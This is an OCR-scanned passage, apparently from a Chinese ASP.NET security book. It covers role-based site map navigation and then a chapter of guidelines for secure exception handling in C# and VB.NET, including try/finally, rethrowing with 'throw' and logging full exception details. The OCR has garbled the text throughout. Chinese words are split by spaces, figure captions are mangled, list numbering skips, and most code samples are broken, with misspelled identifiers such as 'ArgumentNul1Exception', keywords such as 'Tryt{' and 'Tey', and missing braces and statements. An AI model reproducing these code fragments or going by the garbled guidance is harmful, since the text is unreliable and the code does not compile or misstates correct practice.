在 上 面 的 配置 中 ， 指 定 了 站 点 地 图 使 用 的 服务 类 ， 默 认 是 XmlSiteMapProvider 类 。 在 


Ma 
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添加 siteMapProvider 的 过 程 中 ， 除 了 指定 Provider 类 的 准确 名 称 以 外 ， 还 需要 指定 
siteMapFile 的 路 径 以 及 开启 安全 修剪 选项 ， 即 securityTrimmingEnabled='"true"。 

为 了 能 够 实现 不 同 的 用 户 的 导航 地 图 不 同 ， 需 要 在 defaultaspx 页 面 中 添加 
SiteMapDataSource 控件 和 TreeView 控件 ，TreeView 的 dataSource 属性 使 用 
SiteMapDataSource 控件 的 名 称 。 

Default.aspx 页 面 的 代码 如 下 : 


<body> 
<form id="forml" runat="server"> 
<div> 
<asp:SiteMapPath ID="SiteMapPathl1" runat="server" PathSeparator="-—- > "> 
</asp:SiteMapPath> 
<asp:SiteMapDataSource ID="SiteMapDataSourcel" runat="server"/> 
</div> 
<asp:TreeView ID="TreeViewl" runat="server" DataSourceID="SiteMap- 
DataSourcel" ShowLines="True"> 
</asp:TreeView> 
&nbsp7 
<asp:LoginView ID="LoginViewl" runat="server"> 
<LoggedInTemplate> 
Logged as<asp:LoginName ID="LoginNamel" runat="server"/> 
<br /> 
<asp:Loginstatus ID="LoginStatusl" runat="server" Width="75px"/> 
</LoggedInTemplate> 
<AnonymousTemplate> 
<asp:Login ID="Loginl" runat="server"> 
</asp:Login> 
</AnonymousTemplate> 
</asp:LoginView> 
</form> 
</body> 


现在 我 们 试 着 运行 default.aspx 页 面 进入 站 点 , 尝试 使 用 不 用 的 用 户 登 录 , 看 看 站 点 地 
图 的 显示 有 什么 不 同 ， 如 图 10-5 一 图 10-7 所 示 。 





RootNode— > DefaultPage RootNode_> DefaultPage 
=-RootNode 局-RootNode 


DefaultPage 已 -Admin 
| Ladminp: agel 


登录 
用 户 名 :| - 
客 码 ;| -DefaultPage 








厂 下 次 记 住 我 。 a 
as Jemmy 
登录 | 注销 
图 10-5 未 登录 时 的 站 点 地 图 图 10-6 具有 Admin 角色 的 用 户 


登录 之 后 的 站 点 地 图 
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图 10-7 Guest 角色 用 户 登录 后 的 站 点 地 图 


通过 上 面 这 个 例子 将 ASP.NET 中 的 成 员 和 角色 管理 应 用 到 了 实际 的 问题 中 ， 同 时 ， 
读者 也 能 更 多 地 了 解 到 成 员 和 角色 管理 的 作用 。 
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本 章 将 介绍 设计 和 保护 出 错 信息 和 系统 日 志 。 出 错 的 信息 中 往往 包括 了 一 些 敏感 的 系 
统 信息 ， 黑 客 经 常 通 过 这 些 错误 信息 掌握 系统 的 一 些 情况 。 所 以 ， 系 统 日 志 的 安全 对 于 整 
个 应 用 程序 的 安全 起 着 至 关 重 要 的 作用 。 


11.1 安全 处 理 ASP.NET 系统 错误 


错误 异常 是 系统 的 重要 组 成 部 分 ， 在 调试 阶段 ， 能 够 清楚 的 告诉 软件 研发 人 员 在 代码 
的 哪 行 出 了 错误 ， 是 什么 方法 调用 时 出 了 问题 ， 错 误 到 底 存在 于 哪个 文档 等 情况 。 错 误 异 
常 是 说 明 错 误 发 生 的 时 间 、 地 点 和 形成 的 原因 。 错 误 异常 便于 软件 研发 人 员 努 力 修订 自己 
的 代码 ， 尽 量 避 免 类 似 情况 发 生 。 

在 测试 阶段 ， 错 误 异 常 便于 测试 人 员 写 出 测试 文档 ， 在 测试 文档 中 ， 蜡 常 使 相关 人 员 
便于 理解 并 对 源 程序 进行 修订 。 在 这 里 ， 错 误 异 常 提供 了 必要 的 软件 研发 人 员 名 称 ， 软 件 
版 本 号 ， 连 同 写作 时 间 和 运行 时 间 。 

在 运行 阶段 ， 错 误 异 常 提供 了 用 户 尽 可 能 的 友好 信息 ， 便 于 理解 和 交互 。 


11.1.1 错误 异常 处 理 机 制 


由 try 代码 块 保 护 的 代码 所 发 生 的 任何 异常 ， 甚 至 包括 在 不 含 try 代码 块 的 被 调 函数 或 
方法 以 内 的 异常 都 将 被 catch 代码 块 内 的 代码 处 理 。 当 然 ， 除 非 catch 代码 块 自己 也 抛 出 异 
常 ， 和 否则 在 这 种 情况 下 异常 会 被 抛 出 到 下 一 个 级 别 更 高 的 try 代码 块 。 

假如 有 若干 个 catch 块 ,那么 异常 将 根据 其 类 型 被 抛 给 最 适当 的 一 个 catch 块 进行 处 理 。 
假如 没有 找到 可 接受 的 catch 块 , 则 异常 会 从 当前 的 try 块 抛 到 调用 顺序 链 中 下 一 个 可 用 的 
catch 块 。 

异常 对 象 类 型 给 出 了 发 生 错 误 本 质 的 重要 信息 。 除 此 之 外 异常 还 能 够 通过 throw 关键 
词 显 式 抛 出 。 

代码 能 够 选择 性 地 处 理 那些 有 能 力 处 理 的 错误 ， 其 他 问题 都 会 统统 交 给 调用 堆栈 ， 哪 
怕 只 作 通 知 处 理 。 在 实际 应 用 中 ， 让 try 代码 段 检查 抛 出 的 异常 对 性 能 有 一 定 的 影响 ， 所 
以 使 用 单个 try 块 同时 对 应 多 个 异常 的 catch 语句 是 检查 代码 多 个 特定 错误 的 最 好 方式 。 








11.1.2 ”错误 异常 组 成 


根据 系统 应 用 ， 常 见 错误 异常 分 为 数据 存储 部 分 、 应 用 部 分 、 数 据 层 部 分 和 业务 罗 辑 
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口 数据 存储 部 分 : 主要 反映 系统 在 和 数据 库 产品 交互 时 常见 的 一 些 错误 ， 如 数据 库 
连接 错误 ， 数 据 库 对 象 不 存在 或 数据 字符 过 多 等 。 

口 应 用 部 分 : 主要 反映 用 户 在 键盘 输入 操作 时 可 能 引起 的 数据 类 型 错误 ， 字 符 长 度 

超过 限制 ， 使 用 鼠标 或 键盘 可 能 引起 的 操作 错误 等 。 

口 数据 层 部 分 : 主要 反映 系统 框架 中 的 一 些 错误 ， 如 数组 下 标 越界 ， 数 字 超 出 范 

围 等 。 

口 业务 逻辑 层 部 分 : 主要 反映 系统 中 一 些 诸如 权限 被 拒绝 ， 输 入 参数 错误 的 问题 。 




















11.2 异常 处 理 程序 的 设计 


错误 异常 是 报告 错误 的 标准 机 制 ， 异 常 的 采用 增进 了 框架 设计 的 一 致 性 ， 允 许 无 返回 
类 型 的 成 员 《〈 如 构造 函数 ) 报告 错误 。 异 常 还 允许 程序 处 理 错误 或 根据 需要 终止 运行 。 默 
认 行为 是 在 应 用 程序 不 处 理 引 发 的 异常 时 ， 终 止 应 用 程序 。 

接 下 来 将 从 错误 异常 的 引发 、 错 误 异常 的 处 理 、 错 误 异 常 的 类 型 、 错 误 异 常 的 安全 与 
性 能 等 角度 介绍 异常 处 理 程序 应 该 如 何 进行 设计 。 


11.2.1 错误 异常 的 引发 


当 某 一 成 员 无 法 成 功 执行 应 该 执行 的 操作 时 ， 将 引发 错误 异常 ， 即 执行 故障 。 例 如 ， 
Connect 方法 无 法 连接 到 指定 的 远程 终结 点 ， 就 叫做 一 个 执行 故障 ， 将 引发 异常 。 

不 恰当 的 抛 出 错误 提示 将 会 为 黑客 提供 信息 支持 。 在 设计 代码 时 ， 需 要 按照 下 列 准则 
确保 在 适当 时 引发 异常 。 

(1) 不 要 返回 错误 代码 ， 异 常 是 报告 框架 中 的 错误 的 主要 手段 。 

(2) 尽 可 能 不 对 正常 控制 流 使 用 异常 。 除了 系统 故障 及 可 能 导致 占用 状态 的 操作 之 外 ， 
框架 设计 人 员 还 应 设计 一 些 API 以 便 用 户 可 以 编写 不 引发 异常 的 代码 。 例 如 ， 可 以 提供 一 
种 在 调用 成 员 之 前 检查 前 提 条 件 的 方法 ， 以 便 用 户 可 以 编写 不 引发 异常 的 代码 。 

在 实际 开发 中 ， 很 多 开发 人 员 忽 视 了 检查 对 象 是 否 被 实例 化 或 是 否 为 空 ， 这 将 导致 系 
统 抛 出 不 必要 的 错误 提示 。 下 面 的 代码 实例 演示 如 何 进行 测试 以 防止 在 消息 字符 串 为 null 
时 引发 异常 。 实 例 包 括 一 个 名 为 Doer 的 类 ， 一 个 测试 方法 TesterDoer， 代 码 如 下 : 


public class Doer 








{ 
// 抛 出 错误 
public static void ProcessMessage (string message) 
上 
if (message == null) 
throw new ArgumentNul1Exception ("message") 7 
} 
} 
// Other methods... 
} 


"Ns 
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public class Tester 
本 


public static void TesterDoer (ICollection<string> messages) 


foreach (string message in messages) 


// 检查 对 象 
// 但 不 在 此 抛 错误 
if (message != null) 
{ 
Doer .ProcessMessage (message); 
FE 
} 


上 
} 
(3) 不 要 包含 可 能 根据 某 一 选项 引发 异常 的 公共 成 员 。 也 就 是 说 ， 对 于 方法 中 传 入 的 
参数 ， 不 要 将 错误 报告 作为 参数 加 入 。 
例如 ， 不 要 定义 如 下 的 成 员 : 


Uri ParseUri (string uriValue, bool throwOnError) 


(4) 不 要 包含 将 异常 作为 返回 值 或 输出 参数 返回 的 公共 成 员 。 
此 项 准 适 用 于 公共 成 员 ， 使 用 私有 帮助 器 方法 构造 和 初始 化 异常 是 可 以 接受 的 。 
(5) 使 用 异常 生成 器 方法 。 


从 不 同 的 位 置 引发 同一 异常 的 情况 经 常会 发 生 ， 为 了 避免 代码 膨胀 ， 请 使 用 帮助 器 方 
法 创建 异常 并 初始 化 其 属性 。 
帮助 器 方法 不 能 引发 异常 ， 否 则 堆栈 跟踪 将 无 法 正确 反映 出 引发 异常 的 调用 堆栈 。 


(6) 不 要 从 异常 筛选 器 中 引发 异常 。 当 异常 筛选 器 引发 异常 时 ， 公 共 语 言 运 行 库 将 捕 
获 该 异常 ， 然 后 该 筛选 器 返回 false。 此 行为 与 筛选 器 显 式 执行 和 返回 false 的 行为 无 法 区 
分 ， 因 此 很 难 调试 ， 有 些 语言 (如 C#) 不 支持 异常 筛选 器 。 


(8) 不 要 抛 出 new Exception()。 

Exception 是 一 个 非常 大 的 类 ， 如 果 没 有 side-effect， 很 难 去 捕获 。 解 决 的 办 法 是 引用 
自己 的 异常 类 ， 使 它 继 承 自 AppliationException。 通 过 这 种 方法 可 以 设计 一 个 专门 的 异常 
捕获 程序 去 捕获 框架 抛 出 的 异常 ， 同 时 设计 另 一 个 异常 捕获 程序 来 处 理 自己 抛 出 的 异常 。 

(9) 不 要 把 重要 的 异常 信息 放 在 Message 中 。 

当 返 回 异常 信息 时 ， 需 要 创建 存储 数据 的 区 域 。 如 果 没 有 的 话 ， 就 需要 解析 Message。 
想象 一 下 如 果 需 要 局 部 化 甚至 仅仅 想 纠 正 一 个 错误 信息 中 的 拼写 错误 ， 会 对 被 调用 的 代码 
造成 什么 样 的 影响 ， 所 以 不 要 把 重要 的 异常 信息 放 在 Message 中 。 

(10) 每 个 线程 要 有 单独 的 catch 语句 。 

每 个 线程 需要 一 个 单独 的 try/catch 模块 ， 否 则 将 会 丢失 异常 导致 非常 难处 理 的 问题 出 
现 。 当 一 个 应 用 程序 启动 若干 线程 去 做 后 台 处 理 时 ， 通 常 需要 创建 一 个 用 来 存储 处 理 结果 
的 类 。 不 要 忘记 添加 用 来 存储 可 能 发 生 异 常 的 区 域 ， 否 则 在 主线 程 中 将 无 法 与 之 通信 。 在 
“fire and forget” 情 况 下 ， 开 发 人 员 可 能 需要 在 线程 处 理 中 复制 主 应 用 程序 异常 处 理 。 

(11) 异常 捕获 应 该 被 记录 。 

开发 人 员 究竟 使 用 什么 工具 来 记录 日 志 一 一 log4net、EIF、Event Log、TraceListeners 
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或 者 text files 都 无 关 紧要 。 真 正 重要 的 是 : 如 果 捕 获 一 个 异常 ， 一 定 要 在 某 处 加 以 记录 。 
但 是 仅 记录 一 次 一 一 通常 代码 与 记录 异常 的 catch 模块 一 起 被 丢掉 ， 然 后 以 一 个 庞大 的 日 
志 结束 ， 此 日 志 拥有 太 多 重复 信息 。 

(12) 要 记录 Exception 的 全 部 信息 而 不 仅 是 Message。 

在 谈论 记录 日 志 时 ， 不 要 忘记 应 该 经 常 记录 Exception.ToString0) ， 而 不 仅 是 
Exception.Message。 Exception.ToString0 将 会 给 出 一 个 堆栈 跟踪 内 部 的 异常 信息 (message) 。 
通常 ， 这 个 信息 是 极其 珍贵 的 ， 如 果 仅 记录 Exception.Message， 将 会 仅仅 获得 一 些 诸如 
Object reference not set to an instance of an object 的 信息 。 

(13) 每 个 线程 只 能 有 一 个 catch 。 

很 少 有 异常 会 遵循 这 一 法 则 。 如 果 需 要 捕获 一 个 异常 ， 最 好 使 用 为 这 段 代 码 编写 的 最 
明确 的 异常 类 。 

经 常 有 初学 者 认为 好 的 代码 是 不 抛 出 异常 的 代码 ， 这 种 说 法 是 错误 的 。 好 的 代码 在 需 
要 时 抛 出 异常 ， 同 时 仅 处 理 那些 它 知道 如 何 处 理 的 异常 。 

作为 这 个 法 则 的 一 个 应 用 ， 请 看 以 下 实例 。 事 实 上 ， 实 际 项 目的 代码 要 更 复杂 一 些 一 
一 这 里 为 了 说 明 问题 将 它 大 大 简化 了 。 

实例 中 ， 第 一 个 类 〈MyClass) 在 一 个 集合 ， 第 二 个 类 〈GenericLibrary) 在 另 一 个 集 
合 。 在 开发 机 上 ， 这 段 代码 可 以 正确 运行 ， 可 是 在 质量 评价 Quality Assessment，QA) 机 

上 ， 这 段 代码 经 常 返 回 “ 无 效 数据 (Invalid Number) ”， 即 使 输入 的 数据 是 有 效 的 。 原 因 
很 简单 ， 因 为 代码 在 调用 第 2 个 类 GenericLibrary 转化 数据 时 很 可 能 出 错 ， 这 样 开 发 人 员 
只 能 得 到 无 效 数 据 的 结果 ， 而 无 法 真正 获取 可 靠 错误 信息 。 

Convert.ToInt32 仅仅 抛 出 ArgumentException,FormatException 和 OverflowException 例 
外 。 所 以 这 是 唯一 应 该 被 处 理 的 异常 。 

问题 在 于 ， 配 置 中 没有 包含 第 二 个 集合 (GenericLibrary) ， 当 调用 ConvertToInt 时 就 
会 有 一 个 FileNotFoundException 例外 产生 。 

catch(Exception ex) 块 描述 了 OutOfMemoryException 异常 被 抛 出 时 ， 代 码 该 如 何 处 理 。 

演示 代码 如 下 : 

public class MyClass 


人 
public static string ValidateNumber (string UserInput) 








try 

1 
int val = GenericLibrary.ConvertToInt (userInput); 
return "Valid number";} 
catch (Exception)... 


return "Invalid number";} 


public class GenericLibrary 


public static int ConvertToInt (string userInput) : 
{return Convert -ToInt32 (userInput) 
IE 
|: 


(14) 要 把 清理 代码 放 在 finally 模块 中 。 
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开发 人 员 经 常 做 的 一 项 危险 的 事情 就 是 在 catch(Exception) 后 加 了 一 个 空 模块 ， 这 会 带 
来 安全 问题 。 

清理 代码 应 该 放 在 finally 模块 中 ， 由 于 并 没有 许多 普通 的 异常 需要 处 理 ， 程 序 还 拥有 
一 个 中 央 异 常 处 理 函 数 ， 代 码 中 应 该 有 远 比 catch 模块 多 的 finally 模块 ， 所 以 不 应 该 把 处 
理 代码 ， 如 关闭 流 ， 恢 复 状 态 〈 就 像 鼠 标 指针 〉 放 在 finally 模块 之 外 。 

try/finally 模块 可 以 使 代码 变 得 更 加 可 读 与 健壮 。 这 里 举 一 个 例子 , 假设 需要 从 一 个 文 
件 中 阅读 一 些 临时 信息 ， 然 后 以 字符 串 的 形式 返回 。 这 样 的 返回 处 理 功 能 需要 try/finally 
模块 来 完成 。 下 面 演示 了 实现 try/finally 模块 的 代码 : 


string ReadTempFile(string FileName) 

















{ 
string fileContents;using (StreamReader sr = new StreamReader (FileName)) 
. 
fileContents = sr.ReadToEnd(); 
File.Delete (FileName) 


return fileContents; 


上 述 代 码 在 抛 出 异常 时 同样 遇 到 这 个 问题 ， 如 ReadToEnd 函数 ， 它 在 硬盘 上 留 下 临时 
文件 。 但 是 犯错 的 情况 可 能 再 次 发 生 ， 下 面 的 代码 就 演示 了 错误 丢掉 异常 处 理 的 情况 ， 具 
体 如 下 : 

string ReadTempFile (string FileName) 

{ 

Try 

{ 

string fileContents; 

using (StreamReader sr = new StreamReader (FileName)) 


{fileContents = sr.ReadToEnd(); 


File.Delete (FileName); 
return fileContents;} 
catch (Exception) 


{File.Delete (FileName); 
throw; // 丢掉 了 处 理 程序 
1 
} 
既然 上 述 代码 存在 巨大 的 安全 隐患 ， 那 么 就 要 加 固 代码 使 其 安全 。 再 举 一 个 例子 ， 说 
明 怎 样 使 用 try/finally 方法 使 代码 变 得 更 加 可 读 和 健壮 。 
其 代码 如 下 : 
string ReadTempFile (string FileName) 
{ 
Try 


{using (StreamReader sr = new StreamReader (FileName)) 
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人 sr.ReadToEnd(); 

} 

Finally 

:{File.Delete (FileName); 

上 述 代码 中 ， 包 eContents 变量 已 经 被 去 掉 了 ， 因 此 可 以 返回 内 容 后 处 理 代码 执行 ， 这 
就 是 拥有 在 函数 返回 后 执行 代码 的 优势 之 一 ， 此 处 可 以 清空 可 能 在 返回 状态 时 依然 需要 的 

(15) 经 常 使 用 using。 

仅仅 在 一 个 对 象 上 调用 Dispose 函数 是 远 远 不 够 的 。 关 键 字 using 将 会 阻止 资源 泄漏 ， 
即使 在 有 异常 出 现 的 地 方 。 

(16) 不 要 在 错误 条 件 下 返回 特殊 值 。 

这 里 所 说 的 特殊 值 存在 很 多 问题 ， 例 如 : 

口 当 从 函数 返回 特殊 值 时 ， 每 一 个 函数 都 需要 被 检查 ， 这 个 过 程 至 少 消耗 一 个 进程 

寄存 器 或 者 更 多 ， 这 些 将 导致 代码 的 运行 缓慢 。 

口 特殊 值 可 以 或 者 将 被 忽略 。 

口 特殊 值 不 携带 堆栈 追踪 ， 可 以 丰富 错误 细节 。 

口 函数 没有 恰当 的 可 以 反映 错误 情况 的 值 返回 。 

下 面 函 数 代码 就 采用 了 计算 类 型 的 返回 值 : 

public int divide (int x, int y){return x / y;} 

(17) 不 要 使 用 异常 暗示 资源 的 丢失 。 

很 多 专家 建议 , 在 极端 的 情况 下 应 该 返回 特殊 值 。 从 .NET 框架 看 ,使 用 这 种 风格 的 唯 

-API 是 那些 返回 一 定 资源 的 API (如 Assembly.GetMnifestStream 方法 ) 。 这 个 API 在 缺 

乏 资 源 的 情况 下 均 返 回 空 。 

(18) 不 要 把 异常 处 理 方法 作为 从 函数 中 返回 信息 的 手段 

把 异常 处 理 方法 作为 从 函数 中 返回 的 信息 是 一 种 极 差 的 设计 。 这 种 情况 下 ， 不 仅 异 常 
的 处 理 缓慢 ， 而 且 代 码 中 许多 的 try/catch 模块 会 导致 代码 很 难 维护 ， 而 相反 ， 恰 当 的 类 设 
计 可 以 提供 普通 的 返回 值 。 

(19) 为 那些 不 该 被 忽略 的 错误 使 用 异常 。 

这 里 通过 实际 的 实例 代码 来 说 明 问 题 。 在 开发 一 个 API 访问 QA 的 时 候 ， 需 要 做 的 第 
一 件 事 是 调用 Login 函数 。 如 果 Login 调用 失败 ， 或 未 被 调用 ， 其 他 的 每 个 函数 调用 都 将 
会 失败 。 所 以 应 该 选择 Login 函数 调用 失败 就 从 中 抛 出 一 个 异常 ， 而 不 是 简单 的 返回 错误 ， 
这 样 调用 程序 就 不 能 忽略 它 。 

(20) 再 次 抛 出 异常 时 不 要 清空 堆栈 追踪 。 

堆栈 追踪 是 一 个 异常 携带 的 最 有 用 的 信息 之 一 。 开 发 人 员 需 要 在 catch 模块 中 放 入 一 
些 异 常 处 理 代码 (如 回 深 一 个 事务 ) ， 然 后 再 抛 出 异常 。 

错误 的 处 理 方法 如 下 : 

Tryt{ // 执行 代码 


| 
catch (Exception ex){ // 错误 捕获 代码 
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throw ex; 


): 


为 什么 上 述 代 码 是 不 安全 的 呢 ? 因 为 当代 码 检查 堆栈 跟踪 时 ， 异 常 将 会 运行 到 
throw ex 这 一 行 ， 隐 藏 了 真实 的 出 错位 置 。 

这 里 需要 注意 的 是 ， 抛 出 新 异常 的 同时 清空 堆栈 追踪 的 throw ex 语句 ， 如 果 开发 人 员 
没有 指定 这 个 异常 ，throw 声明 将 会 再 次 抛 出 catch 声明 捕获 的 异常 ， 这 将 会 保证 你 的 堆栈 
追踪 完整 无 缺 ， 而 且 依 然 允 许 在 catch 模块 中 放 入 代码 。 

实例 代码 如 下 : 

Try 

1/ 执行 代码 


catch (Exception ex) 

{// 错误 捕获 代码 

throw; 

} 

(21) 避免 在 没有 增加 语义 值 时 就 改变 异常 。 

只 有 在 需要 增加 一 些 语义 值 时 才 可 以 改变 异常 。 例 如 , 开发 人 员 需 要 做 一 个 DBMS 连 
接 驱 动 ， 这 样 用 户 就 可 以 不 必 担 心 特殊 的 socket 错误 ， 仅 仅 需 要 知道 连接 失败 即 可 。 

如 果 开 发 人 员 总 是 需要 在 增加 语义 时 改变 异常 ， 那 么 应 该 在 InnerException 成 员 中 保 
持 最 初 的 异常 。 异 常 处 理 代码 中 也 许 同样 有 漏洞 ， 有 了 InnerException 就 会 很 容易 的 找到 

(22) 异常 应 该 用 可 序列 化 (serializable) 标识 。 

大 量 的 情形 需要 异常 是 可 序列 化 的 。 当 从 另 一 个 异常 类 继承 的 时 候 ， 不 要 忘记 增添 可 
序列 化 属性 。 

(23) 有 疑惑 时 不 要 断言 ， 抛 出 异常 。 

在 检查 和 确认 的 时 候 ， 在 代码 中 抛 出 异常 要 比 加 入 声明 好 。 


类 都 应 该 至 少 拥有 三 个 初始 化 构造 函数 。 

使 用 AppDomain.UnhandledException 事件 时 需要 注意 以 下 几 点 : 

口 异常 通知 出 现 的 太 晚 ， 当 收 到 通知 时 ， 应 用 程序 已 经 不 能 对 异常 作出 反应 了 。 

口 异常 如 果 发 生 在 主线 程 (事实 上 ， 是 任何 无 管理 代码 启动 的 线程 中， 应 用 程序 

口 很 难 编写 可 以 不 间断 工作 的 代码 。 这 里 引用 MSDN 的 一 段 话 : “这 个 事件 仅仅 发 
生 在 应 用 程序 启动 时 由 系统 创建 的 应 用 程序 领域 。 如 果 应 用 程序 创建 额外 的 应 用 
程序 领域 ， 在 那些 应 用 程序 领域 中 为 这 一 事件 指定 代表 也 是 没有 作用 的 。” 

口 当代 码 处 理 这 些 事件 时 ， 除 了 蜡 常 本 身 之 外 ， 开 发 人 员 没 有 权力 使 用 所 有 有 用 信 
息 ， 包 括 不 能 关闭 数据 连接 ， 回 滚 事 务 等 等 。 

(24) 不 要 重新 构建 自己 的 安全 模块 。 

有 许多 很 好 的 框架 和 库 来 处 理 异 常 ， 下 面 就 介绍 两 个 微软 公司 提供 的 工具 : 

口 异常 管理 应 用 模块 。 

口 微软 企业 使 用 框架 。 

尽管 如 此 ， 如 果 没 有 严格 的 原则 设计 ， 上 述 的 库 则 几乎 是 没 用 的 。 
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(25) Visual BasicNET 语言 问题 。 
Visual Basic.NET 仿效 C# 的 using 陈述 ， 当 需要 处 理 一 个 对 象 的 时 候 ， 应 该 使 用 如 下 
样式 : 


Dim sw As StreamWriter = Nothing 

Tey 

sw = New StreamWriter("C:\test.txt")" 
// 读 文件 

Finally 

If 


检查 读 取 结果 

sw.Dispose() 

End if 

End Finally 

当 调 用 Dispose 时 ， 如 果 程 序 做 一 些 其 他 文件 操作 ， 很 可 能 直接 导致 代码 出 错 或 是 资 
源 泄露 。 

(26) 不 要 使 用 无 结构 错误 处 理 机 制 。 

无 结构 错误 处 理 机 制 同 时 也 被 认为 是 On Error Goto。 这 个 准则 要 求 在 应 用 程序 中 移 除 
所 有 无 结构 错误 处 理 的 痕迹 。 如 果 代码 到 处 都 是 On Error Goto 语句 ， 则 会 直接 导致 系统 无 
法 获取 真正 的 出 错位 置 。 


11.2.2 ”错误 异常 的 处 理 


和 对 象 进行 安全 处 理 。 
下 面 的 准则 有 助 于 确保 库 正 确 处 理 异 常 : 


Exception 等 ) 处 理 错 误 。 
如 果 捕 捉 异 常 是 为 了 再 次 引发 或 传输 给 其 他 线程 ， 则 需要 捕捉 这 些 异常 。 下 面 的 代码 
演示 了 不 正确 的 异常 处 理 : 


public class BadExceptionHandlingExamplel 


' 
public void DoWork () 
{ 
// 做 一 些 错误 处 理 
} 
public void MethodWithBadHandler () 
{ 
try 
DoWork (); 
} 
catch (Exception e) 
Li 
// 处 理 错误 包 
// 继续 执行 
上 
} 


* 
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(2) 避免 在 应 用 程序 代码 中 捕捉 非特 定 异 常 (如 System.Exception、System.System 
Exception 等 ) 处 理 错误 。 
一 般 情况 下 ， 应 用 程序 不 应 该 处 理 异常 ， 否 则 可 能 导致 意外 状态 。 如 果 不 能 预知 所 有 
可 能 的 异常 原因 ， 也 不 能 确保 恶意 代码 不 会 利用 产生 的 应 用 程序 状态 ， 则 应 该 允许 应 用 程 
序 终止 ， 而 不 是 处 理 异 常 。 
(3) 如 果 捕 捉 异 常 是 为 了 传输 异常 ， 则 不 要 排除 任何 特殊 异常 。 
一 般 只 捕捉 能 够 合法 处 理 的 异常 ， 而 不 在 catch 子 句 中 创建 特殊 异常 的 列表 。 下 面 的 
代码 演示 了 对 以 再 次 引发 为 目的 特殊 异常 进行 不 正确 测试 的 情况 : 
public class BadExceptionHandlingExample2 
public void DoWork() 
// 做 一 些 错误 处 理 
} 
public void MethodWithBadHandler () 


; 
try 





























DoWork () 


catch (Exception e) 
i 
if (e is StackOverflowException || 
e is OutOfMemoryException) 
throw; 


// 处 理 错误 包 , 继续 执行 
} 
} 


(4) 如 果 了 解 特定 异常 在 给 定 上 下 文中 引发 的 条 件 ， 就 捕捉 异常 。 

只 捕捉 可 以 从 中 恢复 的 异常 。 例 如 ， 试 图 打开 不 存在 的 文件 而 导致 的 FileNotFound- 
Exception 可 以 由 应 用 程序 处 理 ， 因 为 应 用 程序 可 以 将 问题 传达 给 用 户 ， 并 允许 用 户 指 定 其 
他 文件 名 或 创建 该 文件 。 如 果 打 开 文 件 的 请 求生 成 ExecutionEngineException， 则 不 应 该 处 
理 该 请 求 ， 因 为 不 了 解 该 异常 的 原因 ， 应 用 程序 就 无 法 确保 继续 执行 是 不 是 安全 的 。 

(5) 不 要 过 多 使 用 catch。 

通常 允许 异常 在 调用 堆栈 中 往 上 传播 ， 捕 捉 不 能 合法 处 理 的 异常 会 隐藏 关键 的 调试 信 
息 。 所 以 ， 不 要 过 多 使 用 catch 块 。 

(6) 避免 将 try-catch 用 于 清理 代码 。 

在 书写 规范 的 异常 代码 中 ，try-finally 远 比 try-catch 要 常用 。 使 用 catch 子 句 是 为 了 允 
许 处 理 异常 (如 记录 非 致 命 错误 ) 。 无 论 是 否 引 发 了 异常 ， 使 用 finally 子 句 即 可 执行 清理 
代码 。 如 果 分 配 昂贵 或 有 限 的 资源 (如 数据 库 连 接 或 流 ) ， 则 应 将 释放 这 些 资源 的 代码 ， 
放置 在 finally 块 中 。 

(7) 捕捉 并 再 次 引发 异常 时 ， 首 选 使 用 空 引用 。 

空 引用 是 保留 异常 调用 堆栈 的 最 佳 方 式 。 下 面 的 代码 演示 了 一 个 可 引发 异常 的 方法 ， 
此 方法 在 后 面 实 例 中 会 进行 引用 : 

public void DoWork (Object anObject) 

省 














人 


// 做 一 些 可 能 的 错误 处 理 
if (anObject == null) 
{ 
throw new ArgumentNullException("anObject", 
"Specify a non-null argument."); 
} 
// 做 操作 
} 


下 面 的 代码 实例 演示 捕捉 异常 ， 并 在 下 一 次 引发 该 异常 时 进行 错误 指定 ， 这 会 使 堆栈 
跟踪 指向 再 次 引发 的 错误 位 置 ， 而 不 是 指向 DoWork 方法 。 
public void MethodWithBadCatch (Object anObject) 
| 
EE 
{ 
DoWork (anObject); 


让 
catch (ArgumentNullException e) 


System.Diagnostics.Debug.Write (e.Message); 
// This is wrong. 

throw e; 

// Should be this: 

// throw; 


(8) 不 要 使 用 无 参数 的 catch 块 处 理 不 符合 CLS 的 异常 。.NET 框架 2.0 版 在 Exception 
的 派生 类 中 包装 了 不 符合 CLS 的 异常 。 
11.2.3 ”错误 异常 的 捕获 

在 实际 研发 中 , 异常 错误 的 类 型 是 多 种 多 样 的 。 而 .NET 框架 提供 了 各 类 安全 错误 的 专 
门 处 理 程序 。 本 节 将 逐一 介绍 .NET 框架 所 提供 的 某 些 异 常 的 最 佳 做 法 。 

1. Exception 和 SystemException 


Exception 和 SystemException 是 三 种 常见 的 异常 捕获 类 库 。 在 具体 的 使 用 过 程 中 ， 读 
者 应 该 遵守 以 下 的 规则 ， 使 它们 能 捕获 有 效 的 出 错 信 息 。 

(1) 不 要 引发 System.Exception 或 System.SystemException。 

(2) 不 要 在 框架 代码 中 捕捉 System.Exception 或 System.SystemException， 除 非 打 算 再 
次 引发 。 

(3) 避免 捕捉 System.Exception 或 System.SystemException, 顶级 异常 处 理 程序 中 除外 。 


2. ApplicationException 


一 定 要 从 T:System.Exception 类 而 不 是 T:System.ApplicationException 类 派生 自 定 义 
异常 。 


3. InvalidOperationException 


如 果 系 统 处 于 不 适当 的 状态 ， 则 会 引发 System.InvalidOperationException 异常 。 如 果 没 
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有 向 属性 集 或 方法 调用 提供 适当 的 对 象 状 态 ， 则 会 引发 System InvalidOperationException。 
例如 ， 癌 System.IO.FileStream 写 入 时 会 引发 System.InvalidOperationException 异常 。 一 组 
相关 对 象 的 组 合 状态 对 操作 无 效 时 ， 也 应 引发 此 异常 。 

1) ArgumentException、ArgumentNullException 和 ArgumentOutOfRangeException 

如 果 向 成 员 传递 了 错误 的 参数 ， 则 会 引发 System.ArgumentException 或 其 子 类 型 。 如 
果 适 用 ， 首 选派 生 程度 最 高 的 异常 类 型 。 

下 面 的 代码 演示 的 是 当 参 数 为 null (在 Visual Basic 中 为 Nothing) 时 引发 异常 的 情况 : 

if (anObject == null) 

: throw new ArgumentNullException("anObject", 

"Specify a non-null argument."); 


} 


在 引发 System.ArgumentException 或 其 派生 类 型 时 ， 应 该 设置 System.Argument 
Exception.ParamName 属性 ， 此 属性 存储 导致 引发 异常 的 参数 名 称 。 
可 以 使 用 构造 函数 重 载 设置 该 属性 ， 使 用 属性 setter 的 隐 式 值 作为 参数 的 值 。 
下 面 的 代码 实例 演示 一 个 属性 ， 该 属性 在 调用 方 传递 null 参数 时 引发 异常 : 
public IPAddress Address 
: get 
{ 


return address; 


Set 
{ 
if(value == nul1) 
{ 
